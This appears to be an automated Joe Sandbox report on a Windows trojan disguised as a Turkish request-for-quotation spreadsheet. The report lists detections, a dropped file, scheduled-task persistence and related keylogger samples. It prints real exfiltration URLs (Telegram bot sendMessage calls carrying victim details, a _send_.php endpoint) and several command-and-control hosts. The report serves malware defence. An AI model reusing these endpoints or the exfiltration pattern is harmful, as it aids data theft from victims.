Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	26%	ReversingLabs
TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	100%	Avira	HEUR/AGEN.1309294
TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Roaming\qovDEn.exe	100%	Avira	HEUR/AGEN.1309294
C:\Users\user\AppData\Roaming\qovDEn.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\qovDEn.exe	26%	ReversingLabs

Source	Detection	Scanner	Label
https://duckduckgo.com/chrome_newtab	0%	URL Reputation	safe
https://duckduckgo.com/ac/?q=	0%	URL Reputation	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	URL Reputation	safe
http://checkip.dyndns.org	0%	URL Reputation	safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
https://reallyfreegeoip.org/xml/8.46.123.33	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
http://checkip.dyndns.org/	0%	URL Reputation	safe
https://reallyfreegeoip.org/xml/8.46.123.33$	0%	URL Reputation	safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
http://checkip.dyndns.org/q	0%	URL Reputation	safe
https://reallyfreegeoip.org	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe
https://reallyfreegeoip.org/xml/	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
reallyfreegeoip.org	188.114.97.3	true	true	unknown
api.telegram.org	149.154.167.220	true	true	unknown
checkip.dyndns.com	158.101.44.242	true	false	unknown
checkip.dyndns.org	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:390120%0D%0ADate%20and%20Time:%2014/10/2024%20/%2019:08:41%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20390120%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D	false		unknown
https://reallyfreegeoip.org/xml/8.46.123.33	false	URL Reputation: safe	unknown
http://checkip.dyndns.org/	false	URL Reputation: safe	unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:390120%0D%0ADate%20and%20Time:%2014/10/2024%20/%2018:29:03%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20390120%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D	false		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://www.office.com/	qovDEn.exe, 0000000F.00000002.2761770176.0000000003592000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://duckduckgo.com/chrome_newtab	qovDEn.exe, 0000000F.00000002.2768391341.00000000043C1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://duckduckgo.com/ac/?q=	qovDEn.exe, 0000000F.00000002.2768391341.00000000043C1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.telegram.org	TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe, 0000000A.00000002.2762742331.0000000003145000.00000004.00000800.00020000.00000000.sdmp, qovDEn.exe, 0000000F.00000002.2761770176.0000000003485000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	qovDEn.exe, 0000000F.00000002.2768391341.00000000043C1000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://api.telegram.org/bot	TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe, 00000001.00000002.1562918049.0000000004185000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe, 0000000A.00000002.2762742331.0000000003145000.00000004.00000800.00020000.00000000.sdmp, qovDEn.exe, 0000000B.00000002.1597437802.0000000003FC6000.00000004.00000800.00020000.00000000.sdmp, qovDEn.exe, 0000000F.00000002.2761770176.0000000003485000.00000004.00000800.00020000.00000000.sdmp, qovDEn.exe, 0000000F.00000002.2758770244.0000000000434000.00000040.00000400.00020000.00000000.sdmp	false		unknown
http://tempuri.org/DataSet1.xsd	TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe, qovDEn.exe.1.dr	false		unknown
https://www.office.com/lB	TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe, 0000000A.00000002.2762742331.000000000324D000.00000004.00000800.00020000.00000000.sdmp, qovDEn.exe, 0000000F.00000002.2761770176.000000000358D000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	qovDEn.exe, 0000000F.00000002.2768391341.00000000043C1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://checkip.dyndns.org	TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe, 0000000A.00000002.2762742331.0000000003061000.00000004.00000800.00020000.00000000.sdmp, qovDEn.exe, 0000000F.00000002.2761770176.00000000033A1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe, 0000000A.00000002.2769685765.0000000004083000.00000004.00000800.00020000.00000000.sdmp, qovDEn.exe, 0000000F.00000002.2768391341.00000000043C1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=	TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe, 0000000A.00000002.2762742331.0000000003145000.00000004.00000800.00020000.00000000.sdmp, qovDEn.exe, 0000000F.00000002.2761770176.0000000003485000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://chrome.google.com/webstore?hl=en	qovDEn.exe, 0000000F.00000002.2761770176.0000000003561000.00000004.00000800.00020000.00000000.sdmp, qovDEn.exe, 0000000F.00000002.2761770176.0000000003552000.00000004.00000800.00020000.00000000.sdmp, qovDEn.exe, 0000000F.00000002.2761770176.0000000003592000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://www.ecosia.org/newtab/	TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe, 0000000A.00000002.2769685765.0000000004083000.00000004.00000800.00020000.00000000.sdmp, qovDEn.exe, 0000000F.00000002.2768391341.00000000043C1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://varders.kozow.com:8081	TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe, 00000001.00000002.1562918049.0000000004185000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe, 0000000A.00000002.2762742331.0000000003061000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe, 0000000A.00000002.2758777957.0000000000433000.00000040.00000400.00020000.00000000.sdmp, qovDEn.exe, 0000000B.00000002.1597437802.0000000003FC6000.00000004.00000800.00020000.00000000.sdmp, qovDEn.exe, 0000000F.00000002.2761770176.00000000033A1000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://aborters.duckdns.org:8081	TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe, 00000001.00000002.1562918049.0000000004185000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe, 0000000A.00000002.2762742331.0000000003061000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe, 0000000A.00000002.2758777957.0000000000433000.00000040.00000400.00020000.00000000.sdmp, qovDEn.exe, 0000000B.00000002.1597437802.0000000003FC6000.00000004.00000800.00020000.00000000.sdmp, qovDEn.exe, 0000000F.00000002.2761770176.00000000033A1000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://ac.ecosia.org/autocomplete?q=	TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe, 0000000A.00000002.2769685765.0000000004083000.00000004.00000800.00020000.00000000.sdmp, qovDEn.exe, 0000000F.00000002.2768391341.00000000043C1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://reallyfreegeoip.org/xml/8.46.123.33$	TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe, 0000000A.00000002.2762742331.00000000030D9000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe, 0000000A.00000002.2762742331.0000000003145000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe, 0000000A.00000002.2762742331.000000000311F000.00000004.00000800.00020000.00000000.sdmp, qovDEn.exe, 0000000F.00000002.2761770176.0000000003419000.00000004.00000800.00020000.00000000.sdmp, qovDEn.exe, 0000000F.00000002.2761770176.0000000003485000.00000004.00000800.00020000.00000000.sdmp, qovDEn.exe, 0000000F.00000002.2761770176.000000000345E000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://anotherarmy.dns.army:8081	TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe, 00000001.00000002.1562918049.0000000004185000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe, 0000000A.00000002.2762742331.0000000003061000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe, 0000000A.00000002.2758777957.0000000000433000.00000040.00000400.00020000.00000000.sdmp, qovDEn.exe, 0000000B.00000002.1597437802.0000000003FC6000.00000004.00000800.00020000.00000000.sdmp, qovDEn.exe, 0000000F.00000002.2761770176.00000000033A1000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe, 0000000A.00000002.2769685765.0000000004083000.00000004.00000800.00020000.00000000.sdmp, qovDEn.exe, 0000000F.00000002.2768391341.00000000043C1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://checkip.dyndns.org/q	TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe, 00000001.00000002.1562918049.0000000004185000.00000004.00000800.00020000.00000000.sdmp, qovDEn.exe, 0000000B.00000002.1597437802.0000000003FC6000.00000004.00000800.00020000.00000000.sdmp, qovDEn.exe, 0000000F.00000002.2758770244.0000000000434000.00000040.00000400.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://chrome.google.com/webstore?hl=enlB	TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe, 0000000A.00000002.2762742331.000000000321C000.00000004.00000800.00020000.00000000.sdmp, qovDEn.exe, 0000000F.00000002.2761770176.000000000355C000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://reallyfreegeoip.org	TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe, 0000000A.00000002.2762742331.00000000030AF000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe, 0000000A.00000002.2762742331.0000000003145000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe, 0000000A.00000002.2762742331.000000000311F000.00000004.00000800.00020000.00000000.sdmp, qovDEn.exe, 0000000F.00000002.2761770176.00000000033EF000.00000004.00000800.00020000.00000000.sdmp, qovDEn.exe, 0000000F.00000002.2761770176.0000000003485000.00000004.00000800.00020000.00000000.sdmp, qovDEn.exe, 0000000F.00000002.2761770176.000000000345E000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe, 00000001.00000002.1562152532.00000000030E5000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe, 0000000A.00000002.2762742331.0000000003061000.00000004.00000800.00020000.00000000.sdmp, qovDEn.exe, 0000000B.00000002.1595308417.0000000002F2A000.00000004.00000800.00020000.00000000.sdmp, qovDEn.exe, 0000000F.00000002.2761770176.00000000033A1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe, 0000000A.00000002.2769685765.0000000004083000.00000004.00000800.00020000.00000000.sdmp, qovDEn.exe, 0000000F.00000002.2768391341.00000000043C1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:390120%0D%0ADate%20a	TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe, 0000000A.00000002.2762742331.0000000003145000.00000004.00000800.00020000.00000000.sdmp, qovDEn.exe, 0000000F.00000002.2761770176.0000000003485000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded	TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe, 00000001.00000002.1562918049.0000000004185000.00000004.00000800.00020000.00000000.sdmp, qovDEn.exe, 0000000B.00000002.1597437802.0000000003FC6000.00000004.00000800.00020000.00000000.sdmp, qovDEn.exe, 0000000F.00000002.2758770244.0000000000434000.00000040.00000400.00020000.00000000.sdmp	false		unknown
https://reallyfreegeoip.org/xml/	TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe, 00000001.00000002.1562918049.0000000004185000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe, 0000000A.00000002.2762742331.00000000030AF000.00000004.00000800.00020000.00000000.sdmp, qovDEn.exe, 0000000B.00000002.1597437802.0000000003FC6000.00000004.00000800.00020000.00000000.sdmp, qovDEn.exe, 0000000F.00000002.2761770176.00000000033EF000.00000004.00000800.00020000.00000000.sdmp, qovDEn.exe, 0000000F.00000002.2758770244.0000000000434000.00000040.00000400.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	true
188.114.97.3	reallyfreegeoip.org	European Union	13335	CLOUDFLARENETUS	true
158.101.44.242	checkip.dyndns.com	United States	31898	ORACLE-BMC-31898US	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1533038
Start date and time:	2024-10-14 11:04:09 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 30s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	21
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe renamed because original name is a hash value
Original Sample Name:	TEKLF TALEP VE FYAT TEKLF RFQ_xlsx.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@22/15@3/3
EGA Information:	Successful, ratio: 75%
HCA Information:	Successful, ratio: 99% Number of executed functions: 274 Number of non-executed functions: 18
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target qovDEn.exe, PID 2816 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
VT rate limit hit for: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe

Simulations

Behavior and APIs

Time	Type	Description
05:05:16	API Interceptor	2265981x Sleep call for process: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe modified
05:05:20	API Interceptor	28x Sleep call for process: powershell.exe modified
05:05:22	API Interceptor	1641180x Sleep call for process: qovDEn.exe modified
11:05:21	Task Scheduler	Run new task: qovDEn path: C:\Users\user\AppData\Roaming\qovDEn.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
149.154.167.220	Snvlerier.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	Snvlerier.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	SecuriteInfo.com.Win32.Evo-gen.25810.23454.exe	Get hash	malicious	XWorm	Browse
	SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe	Get hash	malicious	XWorm	Browse
	mIURiU8n2P.exe	Get hash	malicious	XWorm	Browse
	8svMXMXNRn.exe	Get hash	malicious	NoCry, XWorm	Browse
	sB2ClgrGng.exe	Get hash	malicious	Blank Grabber, XWorm	Browse
	1728716649a09efaf02e58304d0d9f63a90bc410d1231b676f0024be47cb0cc1f511df7bca961.dat-decoded.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	20062024150836 11.10.2024.vbe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	https://minerva.maine.edu/iii/cas/logout?service=https://www.google.com.sg/url?q=amp/s/couriertrip.com/dist/?#?m=bWFnZHkuZ2lyZ2lzQGNkY3IuY2EuZ292	Get hash	malicious	Unknown	Browse
188.114.97.3	AeYgxx6XFk.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	kitaygorod.top/EternalProcessorMultiwordpressdleTempcentraltemporary.php
	http://host.cloudsonicwave.com	Get hash	malicious	Unknown	Browse	host.cloudsonicwave.com/favicon.ico
	alWUxZvrvU.exe	Get hash	malicious	FormBook	Browse	www.avantfize.shop/q8x9/
	foljNJ4bug.exe	Get hash	malicious	FormBook	Browse	www.bayarcepat19.click/fxts/
	RRjzYVukzs.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	863811cm.nyafka.top/video_RequestpacketUpdategeneratorPublic.php
	octux.exe.exe	Get hash	malicious	Unknown	Browse	servicetelemetryserver.shop/api/index.php
	1728514626a90de45f2defd8a33b94cf7c156a8c78d461f4790dbeeed40e1c4ac3b9785dda970.dat-decoded.exe	Get hash	malicious	FormBook	Browse	www.jandjacres.net/gwdv/?arl=VZkvqQQ3p3ESUHu9QJxv1S9CpeLWgctjzmXLTk8+PgyOEzxKpyaH9RYCK7AmxPqHPjbm&Ph=_ZX8XrK
	BILL OF LADDING.exe	Get hash	malicious	FormBook	Browse	www.launchdreamidea.xyz/bd77/
	http://embittermentdc.com	Get hash	malicious	Unknown	Browse	embittermentdc.com/favicon.ico
	scan_374783.js	Get hash	malicious	AgentTesla	Browse	paste.ee/d/gvOd3
158.101.44.242	rPayment_slip.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	1728716649a09efaf02e58304d0d9f63a90bc410d1231b676f0024be47cb0cc1f511df7bca961.dat-decoded.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	20062024150836 11.10.2024.vbe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	TotalXTunisiaXRFQ.scr.exe	Get hash	malicious	MassLogger RAT, Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	z51NEWPO.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	checkip.dyndns.org/
	LOI SPECIFIFCATION.pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	SP0npSA64a.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	GYJ1zSOpOW.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	z27PAYMENT.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	bpdv3trzkv.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
reallyfreegeoip.org	Snvlerier.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.96.3
	Snvlerier.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.96.3
	rPayment_slip.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	1728716649a09efaf02e58304d0d9f63a90bc410d1231b676f0024be47cb0cc1f511df7bca961.dat-decoded.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	20062024150836 11.10.2024.vbe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	Quotation-GINC-19-00204.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.97.3
	New order PO#001498.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	188.114.96.3
	PO 2024-91113.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	_GG__F_ __S______S_S F_S__O_ ___SO_O_.pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	uV0qqqFMpL.exe	Get hash	malicious	DarkTortilla, Snake Keylogger	Browse	188.114.97.3
checkip.dyndns.com	Snvlerier.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	193.122.130.0
	Snvlerier.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	132.226.247.73
	rPayment_slip.exe	Get hash	malicious	Snake Keylogger	Browse	158.101.44.242
	1728716649a09efaf02e58304d0d9f63a90bc410d1231b676f0024be47cb0cc1f511df7bca961.dat-decoded.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	20062024150836 11.10.2024.vbe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	Quotation-GINC-19-00204.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	132.226.247.73
	New order PO#001498.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	193.122.6.168
	PO 2024-91113.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	_GG__F_ __S______S_S F_S__O_ ___SO_O_.pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.6.168
	uV0qqqFMpL.exe	Get hash	malicious	DarkTortilla, Snake Keylogger	Browse	193.122.6.168
api.telegram.org	Snvlerier.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	Snvlerier.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	SecuriteInfo.com.Win32.Evo-gen.25810.23454.exe	Get hash	malicious	XWorm	Browse	149.154.167.220
	SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe	Get hash	malicious	XWorm	Browse	149.154.167.220
	mIURiU8n2P.exe	Get hash	malicious	XWorm	Browse	149.154.167.220
	8svMXMXNRn.exe	Get hash	malicious	NoCry, XWorm	Browse	149.154.167.220
	sB2ClgrGng.exe	Get hash	malicious	Blank Grabber, XWorm	Browse	149.154.167.220
	1728716649a09efaf02e58304d0d9f63a90bc410d1231b676f0024be47cb0cc1f511df7bca961.dat-decoded.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	20062024150836 11.10.2024.vbe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	https://minerva.maine.edu/iii/cas/logout?service=https://www.google.com.sg/url?q=amp/s/couriertrip.com/dist/?#?m=bWFnZHkuZ2lyZ2lzQGNkY3IuY2EuZ292	Get hash	malicious	Unknown	Browse	149.154.167.220

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	Snvlerier.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	Snvlerier.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	SecuriteInfo.com.Win32.Evo-gen.25810.23454.exe	Get hash	malicious	XWorm	Browse	149.154.167.220
	SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe	Get hash	malicious	XWorm	Browse	149.154.167.220
	mIURiU8n2P.exe	Get hash	malicious	XWorm	Browse	149.154.167.220
	8svMXMXNRn.exe	Get hash	malicious	NoCry, XWorm	Browse	149.154.167.220
	sB2ClgrGng.exe	Get hash	malicious	Blank Grabber, XWorm	Browse	149.154.167.220
	1728716649a09efaf02e58304d0d9f63a90bc410d1231b676f0024be47cb0cc1f511df7bca961.dat-decoded.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	20062024150836 11.10.2024.vbe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	https://minerva.maine.edu/iii/cas/logout?service=https://www.google.com.sg/url?q=amp/s/couriertrip.com/dist/?#?m=bWFnZHkuZ2lyZ2lzQGNkY3IuY2EuZ292	Get hash	malicious	Unknown	Browse	149.154.167.220
CLOUDFLARENETUS	https://emojiparqueacuaticoo.site/NClMD/	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	file.exe	Get hash	malicious	LummaC	Browse	104.21.53.8
	http://puzzlewood.net	Get hash	malicious	Unknown	Browse	104.26.7.189
	http://www.umb-re.com	Get hash	malicious	Unknown	Browse	1.1.1.1
	na.elf	Get hash	malicious	Mirai, Okiru	Browse	104.23.26.35
	https://doc.triadexport.in/sen43906919549ed0e54ebff83709ab950143906919549ed0e54ebff83709ab950143906919549ed0e54ebff83709ab950143906919549ed0e54ebff83709ab9/?top=selin.basaran@digiturk.com.tr	Get hash	malicious	Unknown	Browse	104.21.29.214
	https://narrow-light-alley.glitch.me/public/40.htm	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	https://7suexjabb.cc.rs6.net/tn.jsp?f=001xE8SRwhigmS1t9Q8hharXEkJMtvyfHXyEtdChqRiKNIU6tHdVYZrXGoe4i5Oj7rJImD0z9FA9Z7Ns4_zzose6K4lQVeh2_tGOuTiXbWZeuXhaxX7ZExtB4Td1A03nBtQqSZ5QuAnpfceJlaAlK8LlVk_IFIQFC0HoZlDVtfYJ4608JDpqDknb8nuq6XfWPT8zPJXPlvUq6JBwLgT2V2rRco8OpMRVpBWXlDFx7Wa6-JLGG4j0T_z6-voVUEFkiL1LCMiOTeo2QIvK4QEL2LvJxl710RO4fN0VaMWVH9l6y0is4HN5Cx1Qqzl3DAZvvAuiLje330c-f-GdQOY-XTh1y0wrZR-jvtH8jZkGl5Vm4F_UxI-aORgSa4SEUcwRQ9lSV5NXig_pDFPkhWhUs1rJDroriPBbNmNa_eacU5P8HamXhTNKnvtjdOfUUzwPzxuQ12d4wDOvzs=&c=UsjVlbhyxWUzaXBilvRA7ixl0RUEg9wKLi4E_LzFtdA_im3u-L0cAA==&ch=uLTh3SIB3Q3_uex37lbJeSd4Xs7ZrX-qKnWJPNBj-ulohMTWcqn3qg==	Get hash	malicious	Unknown	Browse	1.1.1.1
